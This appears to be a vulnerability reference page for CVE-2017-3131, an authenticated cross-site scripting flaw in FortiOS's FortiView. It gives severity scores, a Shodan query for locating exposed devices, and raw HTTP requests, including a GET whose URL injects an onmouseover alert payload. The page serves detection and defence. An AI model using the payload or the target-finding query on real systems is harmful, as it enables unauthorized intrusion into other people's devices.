🔙 목록으로 돌아가기

CVE-2017-3131: FortiOS 5.4.0 to 5.6.0 - Cross-Site Scripting

TitleFortiOS 5.4.0 to 5.6.0 - Cross-Site Scripting
Authorritikchaddha
SeverityMedium
ImpactSuccessful exploitation could lead to execution of malicious javascript.
RemediationApply the latest security patches or upgrade to new version to mitigate the XSS vulnerability.
CVSS Score5.4
EPSS Score0.11481
CVE IDCVE-2017-3131
CWE IDCWE-79
Shodan Queryhttp.html:"/remote/login" "xxxxxxxx"http.favicon.hash:945408572cpe:"cpe:2.3:o:fortinet:fortios"
Tags cve cve2017 fortinet fortios xss authenticated vuln

🔍 Vulnerability Description

A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.4.0 through 5.4.4 and 5.6.0 allows attackers to execute unauthorized code or commands via the filter input in “Applications” under FortiView.

🌐 HTTP Request

POST /logincheck HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
Connection: close
Content-Length: 39
Content-Type: text/plain;charset=UTF-8
Accept-Encoding: gzip

ajax=1&username=JU9Lnx&secretkey=A2b6rs
GET /ng/fortiview/app/15832%22%20onmouseover=alert(document.domain)%20x=%22y HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/14.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-3131.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-3131.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A